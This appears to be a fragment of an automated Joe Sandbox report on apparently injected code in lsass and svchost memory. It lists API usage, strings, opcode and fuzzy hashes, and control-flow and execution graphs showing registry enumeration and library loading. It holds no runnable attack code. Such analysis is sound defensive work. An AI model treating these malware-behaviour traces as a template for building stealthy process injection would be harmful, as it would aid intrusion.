                                            control_flow_graph 663 202c0ae9804-202c0ae9842 664 202c0ae9848-202c0ae984b 663->664 665 202c0ae9933 663->665 666 202c0ae9935-202c0ae9951 664->666 667 202c0ae9851 664->667 665->666 668 202c0ae9854 667->668 669 202c0ae985a-202c0ae9869 668->669 670 202c0ae992b 668->670 671 202c0ae986b-202c0ae986e 669->671 672 202c0ae9876-202c0ae9895 LoadLibraryExW 669->672 670->665 673 202c0ae990d-202c0ae991c call 202c0af3090 671->673 674 202c0ae9874 671->674 675 202c0ae98ed-202c0ae9902 672->675 676 202c0ae9897-202c0ae98a0 call 202c0af3080 672->676 673->670 683 202c0ae991e-202c0ae9929 673->683 677 202c0ae98e1-202c0ae98e8 674->677 675->673 679 202c0ae9904-202c0ae9907 FreeLibrary 675->679 684 202c0ae98cf-202c0ae98d9 676->684 685 202c0ae98a2-202c0ae98b7 call 202c0aead28 676->685 677->668 679->673 683->666 684->677 685->684 688 202c0ae98b9-202c0ae98cd LoadLibraryExW 685->688 688->675 688->684
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd
                                            Similarity
                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                            • String ID: api-ms-
                                            • API String ID: 2559590344-2084034818
                                            • Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                            • Instruction ID: ce9526800f8a0f85bc88793c8825a76fdea1355de21c7931be02b529e6a7b8ed
                                            • Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                            • Instruction Fuzzy Hash: 00319032212B90D1FE11DB06A89C79D6294BB09BA0F1B052B9FBE473A2DF38C55D8304
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd
                                            Similarity
                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                            • String ID: CONOUT$
                                            • API String ID: 3230265001-3130406586
                                            • Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                            • Instruction ID: 3bab10382ae25f38b3b1a5c87630ee1a7d71810807f588bc5720f1820a17ff55
                                            • Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                            • Instruction Fuzzy Hash: DE116D23318B40C6FB508B56E88C31D66A0F788FE4F054227EB5D87B95DF7AC9488744
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd
                                            Similarity
                                            • API ID: Thread$Current$Context
                                            • String ID:
                                            • API String ID: 1666949209-0
                                            • Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                            • Instruction ID: c4d4982ed5f191253c8f6e8d384e846f457355d32d9817d38341f348d629b157
                                            • Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                            • Instruction Fuzzy Hash: EAD19536208B88C6EA70DB1AE49835E77A0F788B84F110217EBDD47BA6DF39C555CB00
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocFree
                                            • String ID: dialer
                                            • API String ID: 756756679-3528709123
                                            • Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                            • Instruction ID: f6eecbd787ff78f4e92c6b6fac0e43704a481cf27d926e02e8b7673ce402a933
                                            • Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                            • Instruction Fuzzy Hash: D4319523705B95C2FF55DF56988C36D63A0FB44B84F0682279F9807B56EB38C4B98700
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd
                                            Similarity
                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                            • String ID:
                                            • API String ID: 517849248-0
                                            • Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                            • Instruction ID: 0e6e3f53f89941e48a061f18c1508fc8a90b32be57fc0da4f932eebc6dbdb7ec
                                            • Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                            • Instruction Fuzzy Hash: CB013522305B8196FB10DB12A89C76963A1E788FC0F498137CF9943756DE39C9898300
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd
                                            Similarity
                                            • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                            • String ID:
                                            • API String ID: 449555515-0
                                            • Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                            • Instruction ID: d4c0bd763e822144200f078a16a066fcebdfd944db47271af984dff9e080ac38
                                            • Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                            • Instruction Fuzzy Hash: 23111777615B80C2FB249B21E88D71E66A0BB48B85F06052BDB99077A6EF3EC51C8704
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                            • String ID: csm$f
                                            • API String ID: 2395640692-629598281
                                            • Opcode ID: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
                                            • Instruction ID: 38ba8f7b21269fd3b9bf4da63608bcae845370928ebf667d63f4109bac76b113
                                            • Opcode Fuzzy Hash: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
                                            • Instruction Fuzzy Hash: 2351AD32211B81DAFB54CB15E48CB9D3795F384B88F528223DBA64778AEB75C859C708
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd
                                            Similarity
                                            • API ID: CombinePath
                                            • String ID: \\.\pipe\
                                            • API String ID: 3422762182-91387939
                                            • Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                            • Instruction ID: 58c620da79e6000e9b79ff87e859777da2d69fa67d42e0e12367462d5b8a3e82
                                            • Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                            • Instruction Fuzzy Hash: CAF08263308B80D1FB109B53B98C19DA224AB58FD0F098133DF9A07B2ACE3DC4998700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd
                                            Similarity
                                            • API ID: AddressFreeHandleLibraryModuleProc
                                            • String ID: CorExitProcess$mscoree.dll
                                            • API String ID: 4061214504-1276376045
                                            • Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                            • Instruction ID: 44c2d7fa17ed85bb862da8537152fd98739825cdb4636ec5640dd3ff4b972415
                                            • Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                            • Instruction Fuzzy Hash: 2FF01263315784D2FF549B60E8CC36D2360AF58B90F46211B975B46666DF39C49CC700
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd
                                            Similarity
                                            • API ID: CurrentThread
                                            • String ID:
                                            • API String ID: 2882836952-0
                                            • Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                            • Instruction ID: aeb55cec6b7a55ca872fc64ee18e19171bdb6a382fd37deb22fb8e8d49dba66c
                                            • Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                            • Instruction Fuzzy Hash: 8602A536219BC0C6EBA08B55F49835EB7A1F385794F110117EBDE87BA9DB79C498CB00
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd
                                            Similarity
                                            • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 2210144848-0
                                            • Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                            • Instruction ID: f7ed3af27d76bfccc9fb8471a0bf51769a4ebcf67aed316be1b93732fc8d91bd
                                            • Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                            • Instruction Fuzzy Hash: 0B81BB33610750C9FB60AB6688CCBAD67A1F744BC8F464217DF4A53B97DB368449C710
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd
                                            Similarity
                                            • API ID: CurrentThread
                                            • String ID:
                                            • API String ID: 2882836952-0
                                            • Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                            • Instruction ID: 9d399a640bb9f226b8de1ae05f8772ff06d01c88ddc70a103681ebeca164bd03
                                            • Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                            • Instruction Fuzzy Hash: 9761C636519B80C6FA609B25F48C31EB7A1F388784F110217EBDD47BAACB78C568DB04
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3012950284.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_202c0ab0000_lsass.jbxd
                                            Similarity
                                            • API ID: _set_statfp
                                            • String ID:
                                            • API String ID: 1156100317-0
                                            • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                            • Instruction ID: 6e56fc8b63f1f048d3204ae722a941395d88e5c8d400caab7e798ae4ce33c819
                                            • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                            • Instruction Fuzzy Hash: DB11E532B54F80C5F6E41169E4DE3AD14406B57FBCF8B0637AB760EBDB8A1A8C4A4200
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd
                                            Similarity
                                            • API ID: _set_statfp
                                            • String ID:
                                            • API String ID: 1156100317-0
                                            • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                            • Instruction ID: 2edf33ed1164340e63f63a0d3027f3ef493e8ef5cc600c618098d4d6d1b67b67
                                            • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                            • Instruction Fuzzy Hash: 2411A133F58B41C2F6B81168E5DE36D5041BB64B74F4B4627BB7B863E78B6A8C4A4300
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd
                                            Similarity
                                            • API ID: CurrentProcessProtectVirtual$HandleModule
                                            • String ID:
                                            • API String ID: 1092925422-0
                                            • Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                            • Instruction ID: dbbd5d7f491f5f6cac3024bf119a0553ff861928dcc2bdfd02cc551a2ac0404d
                                            • Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                            • Instruction Fuzzy Hash: E8112A2B709B81C2FB149B15F45C66D66A0F748B84F05412BDF9907796EF3EC518C704
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3012950284.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_202c0ab0000_lsass.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                            • String ID: csm$f
                                            • API String ID: 3242871069-629598281
                                            • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                            • Instruction ID: 843d508fee68e9f0da860d3dd1df250c16b123aac621513f78a37fb2d2a1be6c
                                            • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                            • Instruction Fuzzy Hash: CA518B32612740CAFB28DF29E89CB5D3795F344B98F528227DB1A4778AEB35D849C704
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3012950284.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_202c0ab0000_lsass.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                            • String ID: csm$f
                                            • API String ID: 3242871069-629598281
                                            • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                            • Instruction ID: c2eb2bca5980e0c59ae566e84900ae8bcf2cadf27a87c2250409bce9c75e3fed
                                            • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                            • Instruction Fuzzy Hash: 94314972211B40D6FB28DF1AE88CB1D37A4F740B98F168217AF5A07786DB39C949C709
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd
                                            Similarity
                                            • API ID: Heap$Process$Free
                                            • String ID:
                                            • API String ID: 3168794593-0
                                            • Opcode ID: 945601e3b27397f986722e3b1cc47763393b7b8073906fe23662012aa6634302
                                            • Instruction ID: c9f716bf4cc3f8ec9a282e89e69f0f8b796e66f93dce3a389dc466fbe3e5612a
                                            • Opcode Fuzzy Hash: 945601e3b27397f986722e3b1cc47763393b7b8073906fe23662012aa6634302
                                            • Instruction Fuzzy Hash: FC115B33518B98D2FB54DF66A88C21EB760F789F84F05421BDB9A03756DF39C0598744
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd
                                            Similarity
                                            • API ID: FileType
                                            • String ID: \\.\pipe\
                                            • API String ID: 3081899298-91387939
                                            • Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                            • Instruction ID: f68ce4ff1c380156d6e01e187fc5e501ed0446d0c87c75e41adf4d4f80eeadcb
                                            • Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                            • Instruction Fuzzy Hash: 4D51B5322187C1C2F6749F29A5DC3AE6651F785780F464227DFEA07B9BDE39C4298B40
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd
                                            Similarity
                                            • API ID: ErrorFileLastWrite
                                            • String ID: U
                                            • API String ID: 442123175-4171548499
                                            • Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                            • Instruction ID: 9136cd904abf1a888aa88204d6ce35162ce64a2a17a793135470f4bd62100658
                                            • Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                            • Instruction Fuzzy Hash: 4A418073214B80C1EB609F26E48C79EA7A1F388784F424027EB8D87B99DB79C555CB40
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd
                                            Similarity
                                            • API ID: Stringtry_get_function
                                            • String ID: LCMapStringEx
                                            • API String ID: 2588686239-3893581201
                                            • Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                            • Instruction ID: c1244e4e5751e4e33ab54398f15f8768373e8bd3d7510e7b3c46aef1a1838649
                                            • Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                            • Instruction Fuzzy Hash: 81110836608BC0C6EB60CB16B48829AB7A4F7C9B90F554127EFDD83B5ADF38C4548B04
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd
                                            Similarity
                                            • API ID: ExceptionFileHeaderRaise
                                            • String ID: csm
                                            • API String ID: 2573137834-1018135373
                                            • Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                            • Instruction ID: 5ec152f602f6614b10d7d61dc62558a14f1fa2edeb9862266148b608519f7d2f
                                            • Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                            • Instruction Fuzzy Hash: D4114C32208B8082EB618F15E48825D77A0F788B98F194226DFDD0BB69DF39C569CB04
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd
                                            Similarity
                                            • API ID: CountCriticalInitializeSectionSpintry_get_function
                                            • String ID: InitializeCriticalSectionEx
                                            • API String ID: 539475747-3084827643
                                            • Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                            • Instruction ID: 923404b4932ecc71181cb30068a9546cc491521e033fc7284cfb6fd6de67006a
                                            • Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                            • Instruction Fuzzy Hash: 4EF08223314B80D2FB059B41F48C69D7321AB88B90F4A5127EB9907B56CE3AC9ADD704
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3012950284.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_202c0ab0000_lsass.jbxd
                                            Similarity
                                            • API ID: try_get_function
                                            • String ID: November$October
                                            • API String ID: 2742660187-1636048786
                                            • Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                            • Instruction ID: 679e5424aa469e90ece3b8af143238a50df9fedd07725b9b320bb21ab3ca171a
                                            • Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                            • Instruction Fuzzy Hash: 41E09231200B41E6FA049B51F4CD6ED23219B84740F5F5123975906253CE38C8CE8344
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd
                                            Similarity
                                            • API ID: Valuetry_get_function
                                            • String ID: FlsSetValue
                                            • API String ID: 738293619-3750699315
                                            • Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                            • Instruction ID: d7467d53a769e4656bbbe4c3d3afebbbd9307ba23a939249af377e23a7e14c26
                                            • Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                            • Instruction Fuzzy Hash: 7DE06D63214780D2FF044B50F88C6AC2222BB88780F4A4123DB690A297DE39C86DC704
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocFree
                                            • String ID:
                                            • API String ID: 756756679-0
                                            • Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                            • Instruction ID: 28ae63f6c094da995c863b700c8ad089c3ad79b3e7b2f39ac27c3d30d7f83160
                                            • Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                            • Instruction Fuzzy Hash: F2217133604BD0C1FB118F5AA44C26EB3A0FB88B94F0A4113EF9C47B16EB78C55A8700
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd
                                            Similarity
                                            • API ID: Heap$AllocProcess
                                            • String ID:
                                            • API String ID: 1617791916-0
                                            • Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                            • Instruction ID: 04370fa5f8d30b2195b99abe6e113b6bf610919fa5c6b82f6a71ca1cb9b5a3fa
                                            • Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                            • Instruction Fuzzy Hash: 13E03973611700C6FB048B62D84C35936E1EB88B41F4A8126CA0907351DF7E8499C740

                                            Execution Graph

                                            Execution Coverage:0.7%
                                            Dynamic/Decrypted Code Coverage:0%
                                            Signature Coverage:0%
                                            Total number of Nodes:68
                                            Total number of Limit Nodes:2
                                            execution_graph 14028 2a661301c28 14033 2a661301650 GetProcessHeap HeapAlloc 14028->14033 14030 2a661301c3e Sleep SleepEx 14031 2a661301c37 14030->14031 14031->14030 14032 2a6613015c0 StrCmpIW StrCmpW 14031->14032 14032->14031 14077 2a661301274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14033->14077 14035 2a661301678 14078 2a661301274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14035->14078 14037 2a661301689 14079 2a661301274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14037->14079 14039 2a661301692 14080 2a661301274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14039->14080 14041 2a66130169b 14042 2a6613016b6 RegOpenKeyExW 14041->14042 14043 2a6613016e8 RegOpenKeyExW 14042->14043 14044 2a6613018ce 14042->14044 14045 2a661301727 RegOpenKeyExW 14043->14045 14046 2a661301711 14043->14046 14044->14031 14047 2a66130174b 14045->14047 14048 2a661301762 RegOpenKeyExW 14045->14048 14081 2a6613012c8 RegQueryInfoKeyW 14046->14081 14091 2a66130104c RegQueryInfoKeyW 14047->14091 14052 2a661301786 14048->14052 14053 2a66130179d RegOpenKeyExW 14048->14053 14055 2a6613012c8 16 API calls 14052->14055 14056 2a6613017d8 RegOpenKeyExW 14053->14056 14057 2a6613017c1 14053->14057 14058 2a661301793 RegCloseKey 14055->14058 14060 2a6613017fc 14056->14060 14061 2a661301813 RegOpenKeyExW 14056->14061 14059 2a6613012c8 16 API calls 14057->14059 14058->14053 14064 2a6613017ce RegCloseKey 14059->14064 14065 2a6613012c8 16 API calls 14060->14065 14062 2a661301837 14061->14062 14063 2a66130184e RegOpenKeyExW 14061->14063 14067 2a66130104c 6 API calls 14062->14067 14068 2a661301889 RegOpenKeyExW 14063->14068 14069 2a661301872 14063->14069 14064->14056 14066 2a661301809 RegCloseKey 14065->14066 14066->14061 14070 2a661301844 RegCloseKey 14067->14070 14072 2a6613018ad 14068->14072 14073 2a6613018c4 RegCloseKey 14068->14073 14071 2a66130104c 6 API calls 14069->14071 14070->14063 14074 2a66130187f RegCloseKey 14071->14074 14075 2a66130104c 6 API calls 14072->14075 14073->14044 14074->14068 14076 2a6613018ba RegCloseKey 14075->14076 14076->14073 14077->14035 14078->14037 14079->14039 14080->14041 14082 2a661301499 RegCloseKey 14081->14082 14083 2a661301334 GetProcessHeap HeapAlloc 14081->14083 14082->14045 14084 2a66130135d RegEnumValueW 14083->14084 14085 2a661301485 GetProcessHeap HeapFree 14083->14085 14086 2a6613013af 14084->14086 14085->14082 14086->14084 14086->14085 14088 2a6613013dd GetProcessHeap HeapAlloc 14086->14088 14089 2a66130142f lstrlenW GetProcessHeap HeapAlloc StrCpyW 14086->14089 14090 2a661301413 GetProcessHeap HeapFree 14086->14090 14097 2a661301554 14086->14097 14088->14086 14089->14086 14090->14089 14092 2a6613011b5 RegCloseKey 14091->14092 14095 2a6613010b9 14091->14095 14092->14048 14093 2a6613010c7 RegEnumValueW 14093->14095 14094 2a661301149 GetProcessHeap HeapAlloc 14094->14095 14095->14092 14095->14093 14095->14094 14096 2a66130117f GetProcessHeap HeapFree 14095->14096 14096->14095 14098 2a6613015a4 14097->14098 14101 2a66130156e 14097->14101 14098->14086 14099 2a66130158d StrCmpW 14099->14101 14100 2a661301585 StrCmpIW 14100->14101 14101->14098 14101->14099 14101->14100 14102 2a6612d2908 14104 2a6612d2936 14102->14104 14103 2a6612d2a2b LoadLibraryA 14103->14104 14104->14103 14105 2a6612d2aa7 14104->14105

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd
                                            Similarity
                                            • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                            • String ID:
                                            • API String ID: 1683269324-0
                                            • Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                            • Instruction ID: d58425ed8a59d5428c8ef40dad0f60b78ff9bcff066837ae15f2104d75efcea5
                                            • Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
